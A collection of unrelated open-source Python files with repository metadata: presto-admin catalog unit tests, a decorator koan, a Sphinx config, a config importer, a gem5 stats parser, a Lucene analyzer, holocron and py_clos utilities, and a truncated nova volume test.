@patch('prestoadmin.catalog.os.path.isfile')
def test_add_not_exist(self, isfile_mock):
isfile_mock.return_value = False
self.assertRaisesRegexp(ConfigurationError,
'Configuration for catalog dummy not found',
catalog.add, 'dummy')
@patch('prestoadmin.catalog.validate')
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
isfile_mock.return_value = True
catalog.add('tpch')
filenames = ['tpch.properties']
deploy_mock.assert_called_with(filenames,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
validate_mock.assert_called_with(filenames)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.validate')
def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
deploy_mock):
catalogs = ['tpch.properties', 'another.properties']
listdir_mock.return_value = catalogs
catalog.add()
deploy_mock.assert_called_with(catalogs,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
isdir_mock.return_value = False
self.assertRaisesRegexp(ConfigFileNotFoundError,
r'Cannot add catalogs because directory .+'
r' does not exist',
catalog.add)
self.assertFalse(deploy_mock.called)
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
@patch('prestoadmin.catalog.os.remove')
def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
'then rm /etc/presto/catalog/tpch.properties ; '
'else echo "Could not remove catalog \'tpch\'. '
'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
exists_mock.return_value = True
fabric.api.env.host = 'localhost'
catalog.remove('tpch')
sudo_mock.assert_called_with(script)
local_rm_mock.assert_called_with(get_catalog_directory() +
'/tpch.properties')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_failure(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
out = _AttributeString()
out.succeeded = False
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] Failed to remove catalog tpch.',
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_no_such_file(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
error_msg = ('Could not remove catalog tpch: No such file ' +
os.path.join(get_catalog_directory(), 'tpch.properties'))
out = _AttributeString(error_msg)
out.succeeded = True
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] %s' % error_msg,
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
listdir_mock.return_value = []
catalog.add()
self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
' be deployed\n\n' % get_catalog_directory(),
self.test_stderr.getvalue())
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_permission_denied(self, isdir_mock, listdir_mock):
isdir_mock.return_value = True
error_msg = ('Permission denied')
listdir_mock.side_effect = OSError(13, error_msg)
fabric.api.env.host = 'localhost'
self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
catalog.add)
@patch('prestoadmin.catalog.os.remove')
@patch('prestoadmin.catalog.remove_file')
def test_remove_os_error(self, remove_file_mock, remove_mock):
fabric.api.env.host = 'localhost'
error = OSError(13, 'Permission denied')
remove_mock.side_effect = error
self.assertRaisesRegexp(OSError, 'Permission denied',
catalog.remove, 'tpch')
@patch('prestoadmin.catalog.secure_create_directory')
@patch('prestoadmin.util.fabricapi.put')
def test_deploy_files(self, put_mock, create_dir_mock):
local_dir = '/my/local/dir'
remote_dir = '/my/remote/dir'
catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
PRESTO_STANDALONE_USER_GROUP)
create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
mode=0600)
put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
mode=0600)
@patch('prestoadmin.catalog.os.path.isfile')
@patch("__builtin__.open")
def test_validate(self, open_mock, is_file_mock):
is_file_mock.return_value = True
file_obj = open_mock.return_value.__enter__.return_value
file_obj.read.return_value = 'connector.noname=example'
self.assertRaisesRegexp(ConfigurationError,
'Catalog configuration example.properties '
'does not contain connector.name',
catalog.add, 'example')
@patch('prestoadmin.catalog.os.path.isfile')
def test_validate_fail(self, is_file_mock):
is_file_mock.return_value = True
self.assertRaisesRegexp(
SystemExit,
'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
'Underlying exception:\n No such file or directory',
catalog.add, 'example')
@patch('prestoadmin.catalog.get')
@patch('prestoadmin.catalog.files.exists')
@patch('prestoadmin.catalog.ensure_directory_exists')
@patch('prestoadmin.catalog.os.path.exists')
def test_gather_connectors(self, path_exists, ensure_dir_exists,
files_exists, get_mock):
fabric.api.env.host = 'any_host'
path_exists.return_value = False
files_exists.return_value = True
catalog.gather_catalogs('local_config_dir')
get_mock.assert_called_once_with(
constants.REMOTE_CATALOG_DIR, 'local_config_dir/any_host/catalog', use_sudo=True)
# if remote catalog dir does not exist
get_mock.reset_mock()
files_exists.return_value = False
results = catalog.gather_catalogs('local_config_dir')
self.assertEqual([], results)
self.assertFalse(get_mock.called)
| prestodb/presto-admin | tests/unit/test_catalog.py | Python | apache-2.0 | 9,157 | 0.000655 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutDecoratingWithFunctions(Koan):
def addcowbell(fn):
fn.wow_factor = 'COWBELL BABY!'
return fn
@addcowbell
def mediocre_song(self):
return "o/~ We all live in a broken submarine o/~"
def test_decorators_can_modify_a_function(self):
self.assertMatch(__, self.mediocre_song())
self.assertEqual(__, self.mediocre_song.wow_factor)
# ------------------------------------------------------------------
def xmltag(fn):
def func(*args):
return '<' + fn(*args) + '/>'
return func
@xmltag
def render_tag(self, name):
return name
def test_decorators_can_change_a_function_output(self):
self.assertEqual(__, self.render_tag('llama'))
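# For reference only -- the '__' placeholders above are intentionally left
# blank for the learner to fill in. Tracing the code: @addcowbell returns the
# original function with an extra attribute, so mediocre_song() still returns
# "o/~ We all live in a broken submarine o/~" and mediocre_song.wow_factor is
# 'COWBELL BABY!'; @xmltag wraps the function, so render_tag('llama') returns
# '<llama/>'.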
| Krakn/learning | src/python/python_koans/python2/about_decorating_with_functions.py | Python | isc | 832 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Winton Kafka Streams Python documentation build configuration file, created by
# sphinx-quickstart on Tue May 16 21:00:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Get the project root dir
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import winton_kafka_streams
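# confluent_kafka is a compiled extension that is often not available on the
# machine that builds the documentation, so the modules below are replaced
# with MagicMock instances; this lets autodoc import winton_kafka_streams
# without the real Kafka client being installed.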
from mock import MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return MagicMock()
MOCK_MODULES = ['confluent_kafka', 'confluent_kafka.cimpl', 'confluent_kafka.avro']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Winton Kafka Streams Python'
copyright = '2017, Winton Group'
author = 'Winton Group'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from setuptools_scm import get_version
version = release = get_version(root='..')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WintonKafkaStreamsPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WintonKafkaStreamsPython.tex', 'Winton Kafka Streams Python Documentation',
'Winton Group', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'wintonkafkastreamspython', 'Winton Kafka Streams Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WintonKafkaStreamsPython', 'Winton Kafka Streams Python Documentation',
author, 'WintonKafkaStreamsPython', 'One line description of project.',
'Miscellaneous'),
]
|
wintoncode/winton-kafka-streams
|
docs/conf.py
|
Python
|
apache-2.0
| 5,443
| 0.002021
|
"""
Project Configuration Importer
Handles importing the project configuration from a separate location
and validates its version against the specified expected version.
NOTE: If you update this file or any others in scripts and require a
NEW variable in project_cfg, then you need to UPDATE THE EXPECTED_CFG_VERSION.
That way, if someone tries to use the new scripts with an old cfg, they'll
get a warning.
"""
import importlib
import os
import sys
PROJECT_CFG_DIR = os.path.realpath(os.path.dirname(__file__) + "/../../cfg/")
PROJECT_CFG_NAME = "project_cfg"
EXPECTED_CFG_VERSION = 1.1
def get_project_cfg():
"""
Returns the project configuration module
"""
sys.path.append(PROJECT_CFG_DIR)
try:
project_cfg_module = importlib.import_module(PROJECT_CFG_NAME)
    except ImportError:
raise FileNotFoundError("\n\n================================= ERROR ========================================"
"\nUnable to import project configuration: " + PROJECT_CFG_DIR + "/" + PROJECT_CFG_NAME + ".py"
"\n================================================================================\n")
_verify_correct_version(project_cfg_module)
return project_cfg_module
def _verify_correct_version(project_cfg_module):
is_correct_version = False
if project_cfg_module.__CFG_VERSION__ == EXPECTED_CFG_VERSION:
is_correct_version = True
else:
raise Exception("\n\n================================= ERROR ========================================"
"\nIncorrect project configuration version: " + str(project_cfg_module.__CFG_VERSION__) +
"\n Development environment expected: " + str(EXPECTED_CFG_VERSION) +
"\n================================================================================\n")
return is_correct_version
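# A minimal usage sketch (assumes a cfg/project_cfg.py exists at
# PROJECT_CFG_DIR and defines at least __CFG_VERSION__ = 1.1 to match
# EXPECTED_CFG_VERSION above; any other settings are project-specific):
if __name__ == "__main__":
    cfg = get_project_cfg()
    print("Loaded project configuration, version", cfg.__CFG_VERSION__)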
|
Avantol13/mgen
|
dev/scripts/_project_cfg_importer.py
|
Python
|
gpl-3.0
| 1,937
| 0.005163
|
#!/usr/bin/env python
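# Parses a gem5 stats file: for every "Begin/End Simulation Statistics" block
# it subtracts the dtb/itb walker hits of both switch_cpus from the L2
# overall_hits total, compares that against the separate l2.cachehits counter,
# and writes both values plus their relative difference to <name>-cachecmp<ext>.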
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
|
bcheung92/Paperproject
|
gem5/pyscript/cachecmp.py
|
Python
|
mit
| 2,915
| 0.026072
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import re
from lucene import *
import lucene
dir(lucene)
class vistrailAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = vistrailFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
class stemmingAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
# patterns for splitting words into substrings
patterns = [
# 32 char md5 sums
"[a-f0-9]{32}",
# '2D', '3D'
"2D", "3D",
# words beginning with capital letters
"[A-Z][a-z]+",
# capital letter sequence ending with a word that begins with a capital letter
"[A-Z]*(?=[A-Z][a-z])",
# capital letter sequence
"[A-Z]{2,}",
# non-capital letter sequence
"[a-z]{2,}" ]
splitPattern = re.compile("|".join(patterns))
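# Example of how splitPattern breaks up a mixed-case identifier (a sketch;
# the exact parts kept also depend on the length/duplicate filtering done in
# vistrailFilter below):
#   splitPattern.findall("ReadCSVFile2D")  ->  ['Read', 'CSV', 'File', '2D']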
class vistrailFilter(PythonTokenFilter):
TOKEN_TYPE_PART = "text"
def __init__(self, input):
super(vistrailFilter, self).__init__(input)
self.input = input
self.parts = [] # parts found for the current token
self.current = None
def next(self):
if self.parts:
# continue adding parts
part = self.parts.pop()
t = Token(part, self.current.startOffset(),
self.current.endOffset(), self.TOKEN_TYPE_PART)
t.setPositionIncrement(0)
return t
else:
# find parts
self.current = self.input.next()
if self.current is None:
return None
text = str(self.current.termText())
pattern = splitPattern.findall(text)
# remove single characters and duplicates
pattern = set([p for p in pattern if len(p)>1 and p != text])
# if len(pattern) > 0:
# print "vistrailFilter", text, "-->",','.join(pattern)
self.parts = pattern
return self.current
|
CMUSV-VisTrails/WorkflowRecommendation
|
vistrails/index/vistrailanalyzer.py
|
Python
|
bsd-3-clause
| 4,209
| 0.012354
|
"""Various miscellaneous functions to make code easier to read & write."""
import collections.abc
import copy
import functools
import inspect
import logging
import urllib.parse
import jsonpointer
import jsonschema
_logger = logging.getLogger("holocron")
def resolve_json_references(value, context, keep_unknown=True):
def _do_resolve(node):
node = copy.copy(node)
if isinstance(node, collections.abc.Mapping) and "$ref" in node:
uri, fragment = urllib.parse.urldefrag(node["$ref"])
try:
return jsonpointer.resolve_pointer(context[uri], fragment)
except KeyError:
if keep_unknown:
return node
raise
elif isinstance(node, collections.abc.Mapping):
for k, v in node.items():
node[k] = _do_resolve(v)
elif isinstance(node, collections.abc.Sequence) and not isinstance(node, str):
if not isinstance(node, collections.abc.MutableSequence):
node = list(node)
for i in range(len(node)):
node[i] = _do_resolve(node[i])
return node
return _do_resolve(value)
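# A small usage sketch (hypothetical data): a reference of the form
# "<uri>#<json-pointer>" is resolved against context[<uri>]:
#
#   resolve_json_references(
#       {"encoding": {"$ref": "metadata:#/encoding"}},
#       {"metadata:": {"encoding": "utf-8"}},
#   )
#   # -> {"encoding": "utf-8"}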
class parameters:
def __init__(self, *, fallback=None, jsonschema=None):
self._fallback = fallback or {}
self._jsonschema = jsonschema
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(app, *args, **kwargs):
signature = inspect.signature(fn)
arguments = signature.bind_partial(app, *args, **kwargs).arguments
# First two arguments always are an application instance and a
# stream of items to process. Since they are passed by Holocron
# core as positional arguments, there's no real need to check their
# schema, so we strip them away.
arguments = dict(list(arguments.items())[2:])
parameters = dict(list(signature.parameters.items())[2:])
# If some parameter has not been passed, a value from a fallback
# must be used instead (if any).
for param in parameters:
if param not in arguments:
try:
value = resolve_json_references(
{"$ref": self._fallback[param]},
{"metadata:": app.metadata},
)
except (jsonpointer.JsonPointerException, KeyError):
continue
# We need to save resolved value in both arguments and
# kwargs mappings, because the former is used to *validate*
# passed arguments, and the latter to supply a value from a
# fallback.
arguments[param] = kwargs[param] = value
if self._jsonschema:
try:
format_checker = jsonschema.FormatChecker()
@format_checker.checks("encoding", (LookupError,))
def is_encoding(value):
if isinstance(value, str):
import codecs
return codecs.lookup(value)
@format_checker.checks("timezone", ())
def is_timezone(value):
if isinstance(value, str):
import dateutil.tz
return dateutil.tz.gettz(value)
@format_checker.checks("path", (TypeError,))
def is_path(value):
if isinstance(value, str):
import pathlib
return pathlib.Path(value)
jsonschema.validate(
arguments,
self._jsonschema,
format_checker=format_checker,
)
except jsonschema.exceptions.ValidationError as exc:
message = exc.message
if exc.absolute_path:
message = f"{'.'.join(exc.absolute_path)}: {exc.message}"
raise ValueError(message)
return fn(app, *args, **kwargs)
return wrapper
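# A rough usage sketch (hypothetical processor function; the fallback string
# format "<uri>#<json-pointer>" mirrors what resolve_json_references expects):
#
#   @parameters(
#       fallback={"encoding": "metadata:#/encoding"},
#       jsonschema={
#           "type": "object",
#           "properties": {
#               "encoding": {"type": "string", "format": "encoding"},
#           },
#       },
#   )
#   def process(app, stream, *, encoding="UTF-8"):
#       ...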
|
ikalnytskyi/holocron
|
src/holocron/_processors/_misc.py
|
Python
|
bsd-3-clause
| 4,296
| 0.000466
|
# -*- mode: python -*-
from .combinations import STANDARD_METHOD_COMBINATION
from .specializers import specializer, ROOT_SPECIALIZER
from . import util
from .cache import NoCachePolicy, LRU, TypeCachePolicy
import threading
import inspect
import warnings
try:
from ._py_clos import GenericFunction as GenericFunctionBase
except ImportError:
class GenericFunctionBase:
def __call__(self, *args, **kwargs):
return self.call_slow_path(args, kwargs)
        def initialize_cache(self, map, size, should_grow=False):
            # no-op fallback; accepts the same arguments that
            # initialize_c_cache() passes to the C extension version
            pass
class GenericFunction(GenericFunctionBase):
def __init__(self, name):
self._name = name
self._method_combination = STANDARD_METHOD_COMBINATION
self._methods = []
self._specialized_on = []
self._cache_policies = []
self._lock = threading.Lock()
self.clear_cache()
def redefine(self, method_combination=None):
if method_combination is not None:
self._method_combination = method_combination
self.clear_cache()
def get_cache_size(self):
return len(self._methods) * 4
def cache_should_grow(self):
for i in self._cache_policies:
if i != TypeCachePolicy:
return False
return True
def clear_cache(self):
if self._cache_policies is None:
self._cache = None
else:
for i in self._cache_policies:
if i != TypeCachePolicy:
self._cache = LRU(self.get_cache_size())
return
self._cache = {}
# the idea is that number of possible types is clearly bounded
# so limiting the cache size is unnecessary
def rebuild_specialized_on(self):
maxlen = max((len(i.specializers) for i in self._methods))
bitmap = [False] * maxlen
for i in self._methods:
for j in i.specialized_on:
bitmap[j] = True
self._specialized_on = [idx for idx, i in enumerate(bitmap) if i]
def rebuild_cache_policies(self):
arglen = max((len(i.specializers) for i in self._methods))
spec_count = len(self._specialized_on)
        cps = [[] for _ in range(spec_count)]  # independent lists; [[]] * n would alias a single list
for i in self._methods:
for idx, j in enumerate(self._specialized_on):
if j >= len(i.specializers):
continue
spec = i.specializers[j]
if spec is None:
continue
cps[idx].append(spec.cache_policy)
cps = [util.common_superclass(*i) for i in cps]
for i in cps:
if i is NoCachePolicy:
self._cache_policies = None
self._cache_policies = cps
def get_cache_map(self):
maxlen = max((len(i.specializers) for i in self._methods))
key = [b"_"] * maxlen
for idx, cp in zip(self._specialized_on, self._cache_policies):
if not hasattr(cp, "c_cache_key"):
return None
key[idx] = cp.c_cache_key
return b"".join(key).rstrip(b'_')
def initialize_c_cache(self):
cm = self.get_cache_map()
if not cm:
self.initialize_cache(b"", 0, False)
else:
self.initialize_cache(cm,
self.get_cache_size(),
self.cache_should_grow())
def add_method(self, method):
with self._lock:
self._methods.append(method)
self.rebuild_specialized_on()
self.rebuild_cache_policies()
self.initialize_c_cache()
self.clear_cache()
def get_cache_key(self, args):
return tuple((cp.get_cache_key(args[self._specialized_on[idx]])
for idx, cp in enumerate(self._cache_policies)))
def get_applicable_methods(self, args):
return sorted((i for i in self._methods if i.matches(args)),
key=lambda i: i.sort_key(args))
def get_effective_method(self, args):
with self._lock:
methods = self.get_applicable_methods(args)
return self._method_combination.compute_effective_method(methods)
def call_slow_path(self, args, kwargs={}):
if self._cache is not None:
ck = self.get_cache_key(args)
if ck in self._cache:
return self._cache[ck](*args, **kwargs)
effective_method = self.get_effective_method(args)
if self._cache is not None:
self._cache[ck] = effective_method
return effective_method(*args, **kwargs)
class Method:
__slots__ = ["proc", "specializers", "qualifiers", "next_method_arg"]
def __init__(self, proc,
specializers=[],
qualifiers=[],
next_method_arg=None):
self.proc = proc
self.specializers = specializers
self.qualifiers = qualifiers
self.next_method_arg = next_method_arg
@property
def specialized_on(self):
        return [idx for idx, i in enumerate(self.specializers) if i is not None]
def matches(self, args):
for idx, i in enumerate(self.specializers):
if i is None:
continue
if not i.matches(args[idx]):
return False
return True
def sort_key(self, args):
res = []
for idx, i in enumerate(self.specializers):
if idx >= len(args):
break
if i is None:
i = ROOT_SPECIALIZER
res.append(i.sort_key(args[idx]))
return res
@classmethod
def from_annotated_function(cls, proc, qualifiers=[]):
argspec = inspect.getfullargspec(proc)
arg_names = argspec.args[:len(argspec.args) - len(argspec.defaults or [])]
anno = proc.__annotations__
specializers = [(specializer(anno[i]) if i in anno else None)
for i in arg_names]
return cls(proc,
specializers=specializers,
qualifiers=qualifiers,
next_method_arg=("next_method"
if "next_method" in argspec.args else None))
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
@property
def callable(self):
return self.callable_with_next_method()
def callable_with_next_method(self, next_method=None):
if self.next_method_arg:
def wrapper(*args, **kwargs):
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
return wrapper
else:
return self.proc
def call_method(self, args, kwargs, next_method=None):
if self.next_method_arg:
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
else:
return self.proc(*args, **kwargs)
def defgeneric(name, **kwargs):
gf = GenericFunction(name)
gf.redefine(**kwargs)
return gf
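# A rough usage sketch (hypothetical Circle class; assumes, as
# Method.from_annotated_function suggests, that annotating a parameter with a
# class declares the specializer for that argument position):
#
#   area = defgeneric("area")
#
#   def _circle_area(shape: Circle):
#       return 3.14159 * shape.radius ** 2
#
#   area.add_method(Method.from_annotated_function(_circle_area))
#   area(Circle(radius=2.0))  # dispatches on the runtime class of `shape`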
|
adh/py-clos
|
py_clos/base.py
|
Python
|
mit
| 7,245
| 0.003313
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from nova import test
from nova.tests.xenapi import stubs
from nova.virt.xenapi import volumeops
class VolumeAttachTestCase(test.TestCase):
def test_detach_volume_call(self):
registered_calls = []
def regcall(label):
def side_effect(*args, **kwargs):
registered_calls.append(label)
return side_effect
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(volumeops.vm_utils, 'lookup')
self.mox.StubOutWithMock(volumeops.vm_utils, 'find_vbd_by_number')
self.mox.StubOutWithMock(volumeops.vm_utils, 'is_vm_shutdown')
self.mox.StubOutWithMock(volumeops.vm_utils, 'unplug_vbd')
self.mox.StubOutWithMock(volumeops.vm_utils, 'destroy_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
self.mox.StubOutWithMock(volumeops.volume_utils, 'find_sr_from_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'purge_sr')
volumeops.vm_utils.lookup('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
volumeops.vm_utils.find_vbd_by_number(
'session', 'vmref', 'devnumber').AndReturn('vbdref')
volumeops.vm_utils.is_vm_shutdown('session', 'vmref').AndReturn(
False)
volumeops.vm_utils.unplug_vbd('session', 'vbdref')
volumeops.vm_utils.destroy_vbd('session', 'vbdref').WithSideEffects(
regcall('destroy_vbd'))
volumeops.volume_utils.find_sr_from_vbd(
'session', 'vbdref').WithSideEffects(
regcall('find_sr_from_vbd')).AndReturn('srref')
